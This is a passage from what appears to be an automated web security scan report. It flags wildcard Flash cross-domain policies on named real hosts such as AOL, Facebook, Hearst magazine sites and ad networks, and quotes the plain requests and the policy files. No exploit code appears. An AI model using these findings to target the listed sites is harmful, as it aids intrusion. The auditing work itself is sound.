Date: Sat, 17 Sep 2011 17:24:02 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s02
Last-Modified: Tue, 08 Sep 2009 04:16:43 GMT
ETag: "80cf215-a1-473093bdbc0c0"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>
5.130. http://o.aolcdn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "86252e13a238a19354a0bc819378c538:1294158341"
Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT
Content-Type: application/xml
Cache-Control: max-age=1198014
Expires: Sat, 01 Oct 2011 14:22:26 GMT
Date: Sat, 17 Sep 2011 17:35:32 GMT
Content-Length: 3059
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSc
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.web.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.my.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.estage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.stream.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tmz.warnerbros.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.platformaprojects.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.atwola.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.advertising.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ad-preview.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.icq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="studionow.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.studionow.com" secure="false"/>
...[SNIP]...
5.131. http://open.ad.yieldmanager.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://open.ad.yieldmanager.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: open.ad.yieldmanager.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:04 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 03 Feb 2011 22:39:36 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...
5.132. http://origin.chron.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://origin.chron.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: origin.chron.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-457581153"
Last-Modified: Tue, 24 Apr 2007 18:10:28 GMT
Content-Length: 415
Date: Sat, 17 Sep 2011 16:23:27 GMT
Server: lighttpd/1.4.19

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.chron.com" />
<allow-access-from domain="images.chron.com" />
<allow-access-from domain="chron.com" />
<allow-access-from domain="*.houstonchronicle.com" />
<allow-access-from domain="houstonchronicle.com" />
...[SNIP]...
5.133. http://p.opt.fimserve.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Type: application/xml
Content-Length: 695
Date: Sat, 17 Sep 2011 16:46:09 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...
5.134. http://rd.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:35:05 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>
5.135. http://syndication.mmismm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:36:27 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:24:28 GMT
ETag: "10e-4a8db83b7af00"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...
5.136. http://vid.catalog.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vid.catalog.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: vid.catalog.newsinc.com

Response

HTTP/1.1 200 OK
x-amz-id-2: kINuD0Bcyu12dQbGqQyNuwv4OPjaRnVP7v/ZE65GE5PjqrJgTCef1gH15jk16YSC
x-amz-request-id: 9059D255E24D2AD3
Date: Sat, 17 Sep 2011 16:23:23 GMT
x-amz-meta-cb-modifiedtime: Fri, 25 Mar 2011 16:59:33 GMT
Last-Modified: Fri, 25 Mar 2011 17:04:14 GMT
ETag: "337fabcd64c64b2446307d24d52f6902"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 577
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.newsinc.com"/>
   <allow-access-from domain="*.ap.org"/>
   <allow-access-from domain="*.amazonaws.com"/>
...[SNIP]...
5.137. http://www.adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:19 GMT
Server: Apache
Last-Modified: Tue, 17 May 2011 11:32:15 GMT
ETag: "1de-4a3771fb8e953"
Accept-Ranges: bytes
Content-Length: 478
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...
5.138. http://www.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:44:23 GMT
ETag: "1c437e-17f-495aa38d05940"
Last-Modified: Mon, 22 Nov 2010 20:37:17 GMT
Server: Apache
Content-Length: 383
Connection: close

<?xml version="1.0"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...
5.139. http://www.delish.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.delish.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.delish.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 1198
Content-Type: application/xml
Cache-Control: max-age=569
Date: Sat, 17 Sep 2011 16:27:44 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
...[SNIP]...
5.140. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.228.35
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...
5.141. http://www.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:32:10 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Sat, 17 Sep 2011 17:32:10 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- Begin FetchBack Cross Domain Policy Entry -->
<allow-access-from domain="*.fetchback.com" to-ports="80" />
...[SNIP]...
5.142. http://www.gather.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gather.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:44 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Last-Modified: Wed, 03 Mar 2010 20:18:05 GMT
ETag: "14fb57-163-480eb2e0b3940"
Accept-Ranges: bytes
Content-Length: 355
Keep-Alive: timeout=5, max=100
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.quantserve.com"/>
<allow-access-from domain="*.gather.com"/>
<allow-access-from domain="*.aetna.com"/>
<allow-access-from domain="*.intelihealth.com"/>
...[SNIP]...
5.143. http://www.local.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.local.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:28:14 GMT
ETag: "fc48dcbbf6dcc1:0"
Last-Modified: Thu, 08 Sep 2011 00:34:19 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 598
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.local.com"/>
<allow-access-from domain="*.local.net"/>
<allow-access-from domain="*.qa.local.net"/>
<allow-access-from domain="*.local.gov"/>
...[SNIP]...
5.144. http://www.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:34:48 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...
5.145. http://www.misquincemag.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.misquincemag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.misquincemag.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 17 Sep 2011 16:33:16 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...
5.146. http://www.quickandsimple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quickandsimple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.quickandsimple.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 17 Sep 2011 16:33:29 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
